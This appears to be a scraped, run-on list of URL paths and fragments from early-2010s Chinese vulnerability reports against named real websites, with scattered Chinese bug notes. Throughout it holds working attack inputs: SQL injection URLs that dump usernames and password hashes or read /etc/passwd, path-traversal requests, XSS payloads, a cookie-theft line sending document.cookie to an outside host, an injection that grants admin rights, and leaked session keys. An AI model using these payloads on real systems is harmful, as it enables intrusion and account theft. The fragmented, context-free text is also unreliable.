/cgi/mc?funcid=getusrnewmsgcnt&fid=1&addSubFdrs=1&language=0&style=0&template=newmsgres_setcookie.htm&callback= /cgi/mc /links/admin/fly.jsp /htmledit/admin_login.asp /htmledit/db/ewebeditor.mdb /hd/bjsqx/config/ /NetApplyWeb/personacctoutResult.jsp?bacode=61xx00xxx /154193789 /t_images/face_temp/20111109/pnge6211f49803f9efd2c8f937f6587a609.j"+src=#+onerror="alert(1) /upload.php?type=face&r=0.5138148728288972&p=http%3a%2f%2fs3.ppsimg.com%2ft_images%2fface_temp%2f20111109%2fpnge6211f49803f9efd2c8f937f6587a609.j%22+src=%23+onerror%3d%22alert(1)&x=0&y=0&w=32&h=31&o_page=setting_myface /opinion/showOpioion.action?complaintId=216145 /opinion/showOpioion.action?complaintId=2161458 /main/reader/huodong.do?method=initHuodong / /tag_single_bk.php?wiki=202801096#entry_0 /shopping.rar /cn2/manage/mobile/set_mobile_fill?flow_type=update 
0px;padding:0px 12px 12px go=Request.QueryString("go") FileExt=file.FileExt /ids/control/htmleditor/upload.jsp / admin /website/ /webmall/ /webmall/detail.php?id=fuck /admin.php api.domainshare.tk/resend_email.json?email=webmaster%40bigwww.com&password=feishukeji***&domainname=muingrong.tk&enduseremail=admin%40qq.com /account/resendverifyemail?userId=12 /account/resendverifyemail?userId=13 /index.php?mod=home&adtag=top_home /index.php /USERID dl.xunlei.com/xmp.html /exploits/16680 /exploits/15881 /exploits/15852 /test.php /shownews.asp?id=387965727777778 /news/newscontent-10358-1.htm /而实际上跳转到了http://game.tuduo.com/,而该域名处于未使用状态,如果被恶意使用,将导致土豆网用户“被官网”钓鱼。 /invc/qqplayer/QQPlayer_Setup_32_845.exe /index.php /bugs/wooyun-2010-03358/trace/1dc8c788de0cb67559a876fdc06bf01e /1.js /admin/login.php /admin/login.aspx axadmin.php axphp.php /www.noahacker.com /do/schools.php?f_id=8&a_id=2883 /?clientuin=用户id&clientkey=284E9CE909F4177F7F532275DC931B7ED82B712F0594F49AAD421098BDB0E88A&ADUIN=用户id&ADSESSION=1322041983&ADTAG=CLIENT.QQ.3847_MyTip.0 /client_jump?clickid=6&clientuin=用户id&touin=用户id&clientkey=284E9CE909F4177F7F532275DC931B7ED82B712F0594F49AAD421098BDB0E88A&ADUIN=用户id&ADSESSION=1322034546&ADTAG=CLIENT.QQ.3847_MyTip.0 /adclick?sid=2&cid=25&aid=759&bid=0&unit=3326&advid=3133&guv=&url=http://www.weibo.com/hackxiaoxin /k/IZm,相信群里大部分的人都认识她。利用短网址逃避腾讯恶意网站检测并伪装成QZONE空间诱骗用户输入QQ密码。 / /adclick?sid=2&cid=169&aid=859&bid=0&unit=4918&advid=4684&guv=&url=http://weibo.com/u/2345253177 /adclick?sid=2&cid=169&aid=858&bid=0&unit=4882&advid=4648&guv=&url=http://weibo.com/u/2345253177 /active/girl/user_photo.php?id=169&sid=897 /TR/xhtml1/DTD/xhtml1-transitional.dtd /1999/xhtml /blog7style/images/common/loading.gif /signup/signupmail.php?entry=blog&r=&srcuid=&src=blogicp /blog_rebuild/blog/xmlrpc.php /blog_rebuild/blog/xmlrpc.php?rsd /blog_rebuild/blog/wlwmanifest.xml /rss/2439749250.xml /blog7style/css/conf/blog/index.css /blog7newtpl/css/30/30_1/t.css 120px;top:113.95px 120px;top:200.067px 
z-index:512 /blog7style/images/common/topbar/topbar_logo.gif left /admin/article/article_add.php /blog7style/images/common/sg_trans.gif absolute;left:0;top:0 /u/2439749250 /u/2439749250 /u/2439749250 void(scope.pa_add.add('2439749250')) /u/2439749250 /s/articlelist_2439749250_0_1.html /u/2439749250 /s/profile_2439749250.html #34 /blog7style/images/common/sg_trans.gif /2439749250/blog/180 none /blog7style/images/common/sg_trans.gif /discovery.html /blog7style/images/common/sg_trans.gif /2439749250?source=blog /blog7style/images/common/sg_trans.gif void(0) void(0) /s/profile_2439749250.html#write /blog7style/images/common/sg_trans.gif /blog7style/images/common/number/1.gif /blog7style/images/common/sg_trans.gif /blog7style/images/common/number/2.gif /blog7style/images/common/loading.gif /blog7style/images/common/loading.gif /blog7style/images/common/loading.gif /blog7style/images/common/loading.gif /s/articlelist_2439749250_0_1.html /s/blog_916b9e820100yay9.html /blog7style/images/common/sg_trans.gif /c.php?t=blog&k=%D4%D3%CC%B8&ts=bpost&stype=tag /showpic.html#blogid=832be4280100sbp5&url=http://s3.sinaimg.cn/orignal/832be428ga714e0ea5852 /blog7style/images/common/sg_trans.gif /middle/832be428ga714e0ea5852& /showpic.html#blogid=832be4280100sbp5&url=http://s14.sinaimg.cn/orignal/832be428ga714e33d425d /blog7style/images/common/sg_trans.gif /middle/832be428ga714e33d425d& /showpic.html#blogid=832be4280100sbp5&url=http://s14.sinaimg.cn/orignal/832be428ga714e63e08bd /blog7style/images/common/sg_trans.gif /middle/832be428ga714e63e08bd& /showpic.html#blogid=832be4280100sbp5&url=http://s6.sinaimg.cn/orignal/832be428ga714e3f496f5 /blog7style/images/common/sg_trans.gif /middle/832be428ga714e3f496f5& /?qqfriend10 /?qqfriend10 /s/blog_916b9e820100yay9.html /s/blog_916b9e820100yay9.html#comment 0px;height:0.1px;margin:0px absolute;left:0px;top:0px;width:0px relative /admin/advice/advice_list.php 
/admin/advice/impeach.php?url=http%3A//blog.sina.com.cn/s/blog_4cf7b4ec0100eudp.html%3Ftj%3D1 /chn/ /eng/ / /contactus.html /chn/sina_job.html /intro/lawfirm.shtml /apply/ / /intro/copyright.shtml /index.jsp /blog7common/js/boot.js absolute;top:0;left:0;width:0;height hidden /a.gif?noScript /a1.js / /a.gif?a=&c=860010-0328010000 secure-cn.imrworldwide.com/v52.js secure-cn.imrworldwide.com/cgi-bin/m?ci=cn-sina2006&cg=0 #34 /stevrce /goto.jsp?url=//www.wooyun.org/ /Pages/MemberCenter/Login.aspx /info.php / / /等多个分站评论处存在物理路径泄露,深挖的话,有可能会有xml那个解析漏洞,没深挖。 /miniphp/admin.php /zt/s?k=11603&hasori=1&filter_adv_search= /thread-2354532-1-1.html /%E6%96%B9%E8%B6%85x%3Cscript%3Ealert%28/ss/%29%3C/script%3E/5 /info.php?i=1&u=%CB%D5%B9%DA%BB%AA%27&e=354111841%40qq.com%27%3Cscript%3Ealert%28/s/%29;%3C/script%3E /wp-content/themes/xiaomi/ /index.php?action=rank&date=2011-11-13%27 /register/index.php?a=phone_reg /wsyw/tbpassportapply/tbpassportapply.do?method=grly /j?url=http://toran.cn/1au7l /miniphp/cache/template/2.php /main.php?uid=2805&type=pic&status=1 /main.php?uid=2805&type=pic&status=1&act=sharex sj.xiaomi.com/miniphp/cache/template/8bb2e0a169ed573c81291c5b912aa2f1.php sj.xiaomi.com/miniphp/cache/template/8bb2e0a169ed573c81291c5b912aa2f1.php sj.xiaomi.com/miniphp/config.inc.php /main.php?uid=2805&type=pic&status=1 sj.xiaomi.com/miniphp/cache/template/2.php /miniphp/cache/template/2.php /main.php?uid=2805&type=pic&status=1 sj.xiaomi.com/miniphp/cache/template/3.php /miniphp/cache/template/3.php /invitereg.php?s=UPRYhoSTCA895an54MieFFb%2F2ENCzYD7ZL8M4sEvpz8IJyysbpe3Hw%3D%3D钓鱼地址, /showtopic-135589.html /admin/ajax.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1 /about/news.asp / /163today/163today_tuijian.php?omID=21%20and%201=2%20union%20select%201,group_concat /account/profile/basic.json /bugs/wooyun-2010-03521/trace/0e8e79124cc144c315df6ac4b7432436的 window.location.href='http://我们的flash地址啦/qq.swf?cookie='+document.cookie /smellyxiaozi /admin/monitor_postlog_check.php 
/315/admin/login.php /activity/SQQ5Years_inviteFriends.shtml?_friends=[%225447055%22]&type=&0.45947107020765543 /item_htm.asp?id=2215&2515238 /item_htm.asp?id=165&5526535 /item_htm.asp?id=165&5526535 /item_htm.asp?id=2215&2515238 /agent-admin/login.aspx /freeform/admin/ /index cmt.ifeng.com/admin/login.jsp /picture?p=../.htaccess /picture?p=../../../../cmis/web/dev_meeting/mail.php expressio/*\0*/n expressio/*\0*/n 2011.12.03 2011.12.03 alert(Shelldoe') /index.php?mod=home /index.php?mod=home&adtag=top_home /USERID/infocenter /100000abc123 /gate/big5/ /admin/show/login /filestores/2011/11/27/9fd4b463a22085ee4a3f011a592ed4a7.jpg/1.php /filestores/2011/11/27/9fd4b463a22085ee4a3f011a592ed4a7.jpg%00.php / /widget.php?key=../../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00 /User/MailIndex.aspx只做客户端验证,绕过后可以构造特殊脚本。登陆后脚本如实被打印在页面上执行。但很鸡肋,没法利用。第2个就不一样了; /bbs/attachments/month_1112/11120820515cde193ce2d3a9fe.jpg /bbs/attachments/month_1112/11120820515cde193ce2d3a9fe.jpg /go/getflashplayer /admin2006/ /answer_my.php?tid=63696 /comment/comment.php?action=vote&field= / /wfms/login.jsp /bugs/wooyun-2011-01904的修复是修改了tudou的swf的allowscriptaccess,但是对于其他视频网站的,竟然...啥也没变...还是always /bugs/wooyun-2010-03574 /examples/ /examples/ /data3/exe/cfebd7b436946760143f98bc9cc78fde/XLaccSetup_xlmt-1.1.14.1434.exe /extracare/main_1.asp /jbhc/yuer.asp /admin/login.php?_action=chk /news/s7/panda.php?name=2 /bbs/manage/ /file/id_774356833665645.html下载键盘记录器及lpk.dll文件(只支持Windows /index.php?goto=RETURN_URL /site/callback?referer=http%3A%2F%2Fwww.xiaomi.com%2F&token= /index.php?token= /image.cgi/idea?w=%3Cscript%3Ealert%281%29%3C/script%3E&ic=one&ac=&ity=12&shape=&iclr=&id=3&ch=s.p.cy.res.detail&pid=p.cy.in.i /virtualdevil/blog/item/564b9cce551a4e20f9dc6117.html /bbs/manage/login.php /bbs/manage/modSaybar.php?id=66 /看了下源代码, 488A4255-3236-44B3-8F27-FA1AECAA8844 /aliedit/aliedit/2401/aliedit.cab#Version=1,1,0,0 
/xShare?do=list2&choice=sms&category=x%27%20and%201=2%20union%20select%201,2,3,host,user,password,7,8,9,0,1,2,3%20from%20mysql.user%23&orderby=m_hot /rso/1.php /xiaomi.com /xShare?do=list2&choice=sms&category=x%27%20and%201=2%20union%20select%201,2,3,4,concat%28uid,0x7c,username,0x7c,password,0x7c,salt,0x7c,email%29,6,7,8,9,0,1,2,3%20from%20ucenter.uc_members%20where%20email%20like%27%25snowhilloldman%25%27%20limit%200,1%23&orderby=m_hot /z/q***.htm(***为数字di)的问问页面,此页面有X个答案,每个回答有一个用户名,此用户名可能为真实回答此问题的用户的微博地址,也可能为一个随机生成的系统用户(在此鄙视腾讯的随意和不负责任的数据采集和生成SEO页面的行为),通过替换id到http://wenwen.soso.com/z/QzoneQuestion.e?sp=***的页面,可以得到Y个答案,每个回答有一个用户名,用户名为QQ号..其中X集合不等于Y集合,XY数量不定,为A的子集鸡肋利用:查找id为xxx的用户的qq号码,可搜索此人广播,如有回答#万能的微博#的微博,且被问问转发形成类似http://wenwen.soso.com/z/q***.htm的页面(会有问问转发的一条微博),则可到对应的http://wenwen.soso.com/z/QzoneQuestion.e?sp=***页面中查看,此用户QQ号可能出现在此页面中,根据回答内容可以确定qq号与微博的对应关系,查找出QQ号码,demo /newproduct/love/common.php /webroot/WEB-INF/classes/com/sohu/wap/mydbConn/ /trial/login.aspx /bk.js /_d8.htm?k=s /.svn/entries /sqlite /job.do?method=selJob&catid=6&keywords=http://p0.55tuan.com/themes/default/images/static/img/shanghai.gif&catname=WooYun%20%20piaoye /index.php / admin.被封了以后 /test.php/1.png /QA/uploads/mssql2009.php /plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D xx.com/xx.txt),右键选择迅雷下载,迅雷会将google的cookie传给xx.com。 /user_22710%22%20onerror=%22alert%28document.cookie%29%22 /index/index/cityid/ /backUrlUTF8.do?url=http%3a%2f%2fwww.lashou.com%2f /backUrlUTF8.do?url=http://www.lashou.com/ /login.php?url=http://www.55tuan.com/userLoginSubmit.do /portal-topic-topicid-23.html,点击在线客服,顺手在在线客服地址加个admin路径 /web/admin/,呃,存在。 /2011/0818/aux/self.php?pid=10 /self.php?hid=1 /adminer.php /script/buyer/product_list?list_type=2&product_keywords=%D0%C2%C6%B7%CB%AE%BE%A7%B9%D2%BC%FE%20product_keywords=%D0%C2%C6%B7%CB%AE%BE%A7%B9%D2%BC%FE%20"xxs /phpinfo.php /phpinfo.php /111 /ui2K /cgi-bin/cgi_imgproxy?url=http%3A%2F%2F211.20.209.23%3A8888%2Frpm%2Fimg5000.php&size=0 /test.jsp /data.mdb 
/user/register_email_ok.php?uid=***&email=**@123.com&code=9c7aef28a6e7742cb1157a4d2f0b7375 /user/register_email_ok.php?uid=***&email=***@123.com&code=5addd7dec4e1a4df6c0efc6441e5c41c /d/VNTEYDWQCXST / /manager/js/jquery-1.4.2.min.js,尝试http://hot.baidu.com/manager/也居然提示登陆,扩展名是php,并且默认用户名是admin,通过经验不难看出,这是dedecms的后台。 /Members/ShopComInfo.aspx?Cid=3 /gsps/ /resetPwd.aspx?usernumber=13888888888&sptype=1 /vuldb/ssvid-20898 /TR/xhtml1/DTD/xhtml1-transitional.dtd /1999/xhtml /notice/managerlist.html /bbs/.svn/text-base/config.inc.php.svn-base /bbs/uc_server/data/.svn/text-base/config.inc.php.svn-base /uc_server/api/dbbak.php?加上生成的code串 /Search?book=y&keyword=%27;!--%22;eval%28%27alert%28%5C%27just+a+test%5C%27%29%27%29%3B%22%3CX%3Calert%281234%29%3ES /shtml/mobile_02.shtml?par=99.00&mobileType=mobile&mobileNo=%3Cscript%3Ealert%281%29;%3C/script%3E&czlx=I&parValue=100&productCode=SHKC /member/trademanage/rechargeAndwithdrawRecords/toQuery?startDate=2011as-12-17+00%3A00%3A00&endDate=2011-12-17+00%3A00%3A00 /main.php?s=admin&a=login /taoohostwar/admin/admin.php?select=verify&mod=login&act=default&timeout=1322115299&uniqid=4ecca48195c87&time=1322034305&token=5464a699206315a9c372b961dc09ce31 /admin/login.html /200704changcheng/admin/login.php /blogflag/admin/login.html /auto/4s-admin/login.php /prog/wapsite/stat/cooperate/login.html /article.php?acid=-1'+union+select+GROUP_CONCAT(DISTINCT+username,0x5f,password,0x5f,status,0x5f,num),@@basedir+from+sds_user/* /ecp.website/bingoCode/login.jsp /bbs/second.html?g=/../../../../../../../../../../../../etc/passwd%00.html /gis/GisHandler.ashx?lastIndex=101&provider=orderGisTrackFaHuo&orderId=(流水订单号) /flash/.svn/entries /more.php?id=-8%20union%20select%201,user(),3,4,5,6,7,8,9,10-- abc.3322.org/XXX /admin/ /index.php/crowdtest/post/showPost/postId/5771/proId/0 /iSpaceWeb/webdisk.action /fuck.txt /的URL都能通过。 /install.log /SITES.INI /nerp/login.jsp /nerp/oa/login.jsp /nerp/oa/main.jsp /1998/Math/MathML /~root 
pay.qq.com/qqshow/index.shtml?ch=self&service_type=qqshow&CacheTime=1325035348 /u/USERID?key_word=%22%3E%3Ciframe%20onload=alert%28document.domain%29%3E&is_search=1 /customerLogin.html?fromu=http%3A%2F%2Funion.baidu.com%2Fuserlogin.action&e=%3CIFRAME%20width=500%20height=1000%20src=%22http://www.wooyun.org%22frameborder=0%20%3E%3C/IFRAME%3E&un=xxx&aid=6&errno=132 /wap/login.php /newver/login.action?toWapTwo=1 /?key=f',true,1 /prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=12715428867+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11-- /manage/login.php /vote.php?act=dovote&name[a%27][111]=aa Array alert(/x/)】,post提交后,所有头像引用代码辩位 alert(/x/) /index.php?m=attachment&c=attachments&a=swfupload_json /index.php?m=attachment&c=attachments&a=album_load&t=1&dosubmit=true&info[where]=%201=1%20and%20%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20concat%28username,0x7c,password%29%20from%20v9_member%20%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29%23 /index.php?m=attachment&c=attachments&a=album_dir&dir=.../../.../...///phpsso_server/ /user/message/send /popsite/meilin/shownewsen.asp?id=140 /plaf/login.jsf /cgi-bin/loginpage?f=xhtml /file/4336122 /new/hello.aspx?para=%27%22%28%29%26%251%3cScRiPt%20%3ealert(/xss/)%3c%2fScRiPt%3e /new/hello.aspx?para=%27%22%28%29%26%251%3cScRiPt%20%3ealert(/xss/)%3c%2fScRiPt%3e /3dyySg /30795848.mp3 /3dyySg?1.mp3 / /wap/post/reply /install/InstallWebService.asmx /install/InstallWebService.asmx /install/InstallWebService.asmx /user/blog没验证token和referrer /wxcs/st/Teacherday/vote.aspx?type=3 / /huangou.php?id=-1%20union%20select%201,2,3,group_concat%28table_name%29,5,6,7,8%20from%20information_schema.tables%20where%20table_schema=database%28%29 /config/ /robots.txt 
www.swust.edu.cn、news.swust.edu.cn、blog.xxox.org等网站的管理员认证。从而查看360网站扫描的扫描结果。 /sdcard/ /mailregAll/reg0.jsp?from=11111111111%3C/script%3E1111111%3Ciframe%20src=http://www.baidu.com%3E11111111111 /file/4378846 /dl.aspx?file=/web.config //manage/admin.aspx /sites_details.asp?areaid=17 /news_details.asp?id=957 /Job/Person.aspx?id=77777 /admin/websiteAdd.jsp /admin/linkPromotion.jsp /admin/myLinkList.jsp /admin/list.jsp /admin/login.jsp /admin/myStats.jsp /project/projectlist.jsp /sysadmin/module/modulelist.jsp /hotinnav.jsp /urank_16_1_274076963.html /application/classes/controller/publish/release.php / /index.php/auth/login //www.weibo.cn),或者通过iphone客户端、Android客户端或ipad等访问,都有可能被session /406tgk /profile/index,编辑个人资料,个人签名输入跨站脚本,点击保存后,跨站脚本立即执行。 /tomos/ui/getpassword.htm /2008/0702/qipai/personal.php?id=32 /UserCenter/Index/?userName= /blog/ /livestream/listlive.php?language=zh_cn&width=242&height=290&uid=1459831275&skin=1&refer=1&pic=1&titlebar=0&border=0&publish=1&atalk=1&recomm=1&at=1&atopic=111&ptopic=1111&dpc=1 /index.php/crowdtest/bug/update/pro_id/416/bug_id/14240 /index.php/crowdtest/bug/update/pro_id/416/bug_id/14240 /auction/publish/edit.htm?item_num_id=14769508366&auto=false /item.htm?id=13867803337的编辑界面,就访问http://upload.taobao.com/auction/publish/edit.htm?item_num_id=13867803337&auto=false /login /data/files/20120202/1328167115.17.txt/x.php /Register.aspx /script/redirect.php?class=china&action=http://lcxv.net /script/redirect.php?class=china&action=http://lcxv.net /admin/index.html /othercity/all.htm?clientkey=0AC8B541A8781EA81CAD4E87DA4ECFCA134DAB81517DACA29823F84705D874A6&Uin=6******0&pref=3007 /qqmail?Fun=clientread&ptlang=2052&httptype=0&uin=QQ号&k=嗅探到的clientkey /view/7a3900ea551810a6f5248632.html, /view/7a3900ea551810a6f5248632.html, 
/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1 username=admin /searchs?keywords=%25%27%29+and+1%3D1+and+1+like%28%27%251 abram.intra.vcotton.com/www/current/app/app_controller.php /app/v1.0/qryfriends.cgi?OutPutType=JSON,用户过单点登录情况下泄露该qq账号的好友信息 /queryBill.jsp ?return_url=http://www.qq.com ?return_url=http://www.taobao.com ?return_url=http://www.icbc.com.cn ?return_url=http://www.alipay.com /space/Other/Posts.aspx?userid=5469987%27 www.it168.chinacache.net www.it168.chinacache.net www.bbs.it168.com www.itpub.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.free.it168.com www.free.it168.com www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.hr.it168.com www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.staff.it168.com www.staff.it168.com www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.udc.it168.com www.udc.it168.com 119.254.79.192/26 119.254.79.32/29 www.vip.it168.com www.vip.it168.com www.it168.chinacache.net www.it168.com www.it168.chinacache.net www.it168.com www1.it168.com www17.it168.com www18.it168.com www2.it168.com www3.it168.com www4.it168.com 
www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net com.anguanjia.safe/shard_prefs文件夹 /先随便登录下,产生SESSION后再点击“注册”,在注册页面中就会返回找不到储存SESSION的文件的路径和程序的路径。 wap.soufun.com/bbs/register.php wap.soufun.com/bbs/register.php:2 wap.soufun.com/bbs/register.php /下的多个页面被插入恶意内容,并存在SQL注入 /market/eles/news_view.asp?newsid=92 /inc/ /market/zhongjie/admin/ /market/zhongjie/admin/news.asp /market/zhongjie/admin/com.asp /market/zhongjie/showcom.asp?id=23 /viewnotify.php?id=4758%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,name,password,11,concat(0x61696D65657875,load_file(0x2f6574632f706173737764),0x61696D65657875),13,14,15,16,17,18,19%20from%20pku_admin%20limit%200,1-- /uc.php /friends/index_blessing.php?id=7717 /bbs/showtree.aspx?topicid=4485&postid=40214 /2008/killtshirt/default.aspx?Page=6 /bridgeImpplayclub.asp?playno=14&flag=-1&cardno=1389626 /bbs/showtree.aspx?topicid=4485&postid=40214#不用显示错误吧 /dpool/eladies/commentslist.php?vt=4&product_id=10171%20and%201=1 /dpool/eladies/commentslist.php?vt=4&product_id=10171%20and%201=2 /more.php?id=1 /admin/manager.php /region1.php?id=2&pid=2 /zhuanti/njxn/njxnvote.asp /2007spring/guangzhou/show2.asp /zhuanti/yht/view.asp?p_id=13&class_id=21&id=262 /sechouse2/products.asp /xinxi/shownews.asp?id=(575)And(1)=(2)UNION%0DSELECT%0D1,chr(116)%2bchr(101)%2bchr(115)%2bchr(116),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%0Dfrom%0DMSysAccessObjects /plus/feedback_ajax.php?dopost=getlist&aid=22668&page=a /plus/hotels_feedback_ajax.php?dopost=getlist&hid=557&page= /list.php?cls=104 /detail.php?id=error guide.cn.real.com/newsite/youku/list.php guide.cn.real.com/newsite/youku/list.php guide.cn.real.com/newsite/youku/detail.php /api_ptvideoinfo?pid=XMTI3Ng==&id=error guide.cn.real.com/newsite/youku/detail.php /player.php?pv=&tag=whhgx&vid=XMTgwMzc5Njg4&title=%E4%BA%8E%E9%9B%AA%E8%96%87 /audi-ade/play.php?type=tt&vid=XMjgwMDk1MjEy 
/audi-ade/play.php?type=tt&vid=XMjgwMDk1MjEy%3C/script%3E%3Cscript%20src=http://127.0.0.1/webpage.js%20type=text/javascript%3Ediaoyu();/* /i?ct=6&bt=1&tn=baidudetaillost&isign=2939662430,1160510623&tsign=612809584,2382851181 /friends/index_blessing.php?id=26083 /usr/eXtplorer/index.php?extplorer /adm/index.php admin admin23 /chexian/admin/phpMyAdmin-2.11.5.1-all-languages/ /admin/ /admin/login.html /cgi-bin/med/trans_manage.cgi?PcacheTime=624444 /?mod=activity&act=activitydetail&activity_id=70%20and%201=2%20union%20select%200,unhex /?mod=activity&act=activitydetail&activity_id=70%20and%201=2%20union%20select%200,unhex /?mod=activity&act=activitydetail&activity_id=70%20and%201=2%20union%20select%200,unhex /?mod=activity&act=activitydetail&activity_id=70%20and%201=2%20union%20select%200,unhex /etc/passwd /etc/passwd /etc/passwd /etc/passwd /etc/issue /bin/su /etc/passwd /etc/passwd /etc/hosts /etc/passwd /mobile/travelnotes/gettravels.php /jump?uin=123456&skey=@7bmBHm0XLp&u1=http://app100617408.qzone.qzoneapp.com/games/link/movie.html /jump?uin=123456&skey=@7bmBHm0XLp&u1= /games/link/movie.html /chxw2.php?articleID=98%27%20%20%20And%201=2%20UNION%20all%20SELECT%201,2,3,4,5,6,7%20--+a /index.html)下载的越狱版deb安装包,可能由于内部员工疏忽或打包程序BUG,导致内部的.SVN信息被封装进了安装包,解包后可以看到源代码SVN地址、作者、版本号等信息。 /admin.php /team/?addr=%E6%8A%A0%E6%8A%A0%E7%BD%91从在sql注射 /admin /phpMyAdmin/phpMyAdmin/ /news/admin/ /lomo/admin/ /game_compare/admin/single_game_info.php?game_id=55 /sgcq/sgcqangle/sgcqfindangle!list.action?job=5 /wulin2/wl6doorpic/wl6DoorPl!list.action?imgid=2292 /comment/include/connect.inc.php it168 password:123456 /update/ /test/ /update/protected/controllers/UpdateController.php //protected/controllers/UpdateController.php /public/db_backup/HSH.mdb /detail1.php?zid=8371 /mod_user/mod/exterior/ /ws/jsonData.aspx?strwhere=a%27%20and%201=1-- /ws/jsonData.aspx?strwhere=a%27%20and%201=2-- /jump?uin=123456&skey=@7bmBHm0XLp&u1=网址 /uchome/link.php?url=网址 /e/public/jump/?classid=288&id=87098&url=网址 
/Nk7DU&subtemplate=gray&evil=0 /no/ /jump?uin=123456&skey=@7bmBHm0XLp&u1=http://uchome.developer.manyou.com/uchome/link.php?url=http://golf.cctv.com/e/public/jump/?classid=288&id=87098&url=http://t.itc.cn/Nk7DU&subtemplate=gray&evil=0 /bbs/viewthread.jsp?tid=46666&page=1&authorid=1 /archives/171 /getcookie.php\ /getcookie.php /soccer/i.php?a=1122&id_bang_zhu=39 /login.jsp?appuri=RETURN_URL&useruri=RETURN_URL&service=uc /login?passive=true&useruri=USERURI&token=TOKEN /iframe_cookie.php?res_id=2989’ /dnis/index.jsp /Manger/ /inc/upload.asp /2005/tlnewslink.asp?id=802 www.21441.com), /space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1 /space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1%27%29;declare%20@t%20nvarchar%2840%29%20select%20@t=%28select%20top%201%20name%20from%20sysobjects%20where%20name%20like%27%_users%27%20and%20xtype=%27U%27%29%20exec%28%27update%20%27%2b@t%2b%27%20set%20groupid=1%20where%20username=%27%27xxxxx%27%27%27%29-- /search?q=site%3Asohu.com+inurl%3Adb+mysql&hl=zh-CN&newwindow=1&safe=strict&gbv=2&prmd=ivns&ei=g0E5T6z4FuWuiQeum7SJAg&sa=N&oq=site%3Asohu.com+inurl%3Adb+mysql&aq=f&aqi=& QQ:2036234 /p/ /p/ /jump?uin=123456&skey=@7bmBHm0XLp&u1=http%3A%2F%2Fuchome.developer.manyou.com%2Fuchome%2Flink.php%3Furl%3Dhttp://golf.cctv.com/e/public/jump/?classid=288&id=87098&url=http://url.ifeng.com/XZXi&subtemplate=gray&evil=0 /Login.aspx /admin/login.htm /job_content.php?id=15 /plug/search_cont.php?id=19 /countfriendlink.php?id=58&link= /plug/search.php?key=%3Ciframe%20width=800px%20height=600px%20src=http://gesong.org%20%3E%3C/iframe%3E /wap/?a=info&id=75&m=Soft&t=x /wap/?a=down&id=254&m=Soft&softid=75&t=x /wap/?m=Soft&stid=5&t=x /uc_server/control/admin/db.php /static/image/common/logo.png/.php Insight-D / /stockradar/config.html /mobile/cellphone?ky=iphone 
/index.php?action=member-register&act=getSchool&province_id=101%20and%201=2%20union%20select%201,2,TABLE_NAME,4%20from%20INFORMATION_SCHEMA.TABLES-- /extra.php?mod=themevote/stat&tpp=1/*!select*/&page=2 /archives/171 /sid=aWinrA5xZQpbv6nKSv/wapmail/signOn.do /id.php此页面目测位输入账号显示用户昵称与在数据库表中的位置。 /act.php此页面爆路径 /space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1 /space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1 /svn/trunk/my-unionpay/ /admin /search.php?search=8888%22%3E%3Cscript%3Ealert(/wooyun.org/)%3C/script%3E'%3C /show.php?id=12593 / /1 /admin/login.php www.cueb.edu.cn www.bit.edu.cn www.ccps.gov.cn www.bucea.edu.cn www.xidian.edu.cn www.bnu.edu.cn www.bjta.gov.cn www.sara.gov.cn /changetomanager.do / /ajax/.svn/text-base/action_msg.php.svn-base/1.php //market/index.php?mod=index%3cscript%3ealert(45238)%3c%2fscript%3e&act=app /index.php?act=logout&mod=index&r=%2f%2fwww.baidu.com /zt/20110816/.svn/text-base/setting.php.svn-base /ajax/.svn/text-base/action_msg.php.svn-base //market/index.php?mod=index%3 /rootsule/blog/item/fe6ebc042726730f738b6538.html /、 /admin/Login.aspx /QZadmin/Login.aspx /admin.jsp /admin/login/?msg=ERR.SESSION.TIMEOUT /admin/login.php /admin/adminMain.do /lt/plugin/portal/vild.do是联通用来给客户发联通营业厅信息的,任何人都可以自定义信息发给联通号码,接收的人看到是10010发的,相信程度很高,所以很危险啊 /renwu/admin/login.html /lib/car/bg_all/login.php /index /gate/big5/cosmetics.ifeng.com/admin/logon /freeform/admin/user/login.jsp /admin/login.jsp /docrank/admin/ /admin/login.php /mall/web/guest/admin-login /jsp/xxfb/dt/dyjf2010/login.jsp /power100/login.jsp /mobileshop/g3/admin/login.jsp /adc_area/login.jsp /sp/portal/login.jsp /ptt/admin/login.aspx /admin/login.php /webroot/ /baidu/wp-login.php /wfms/login.jsp /promotion/login.jsp /315/admin/login.php /login/admin.htm /survey/admin/admin.php / 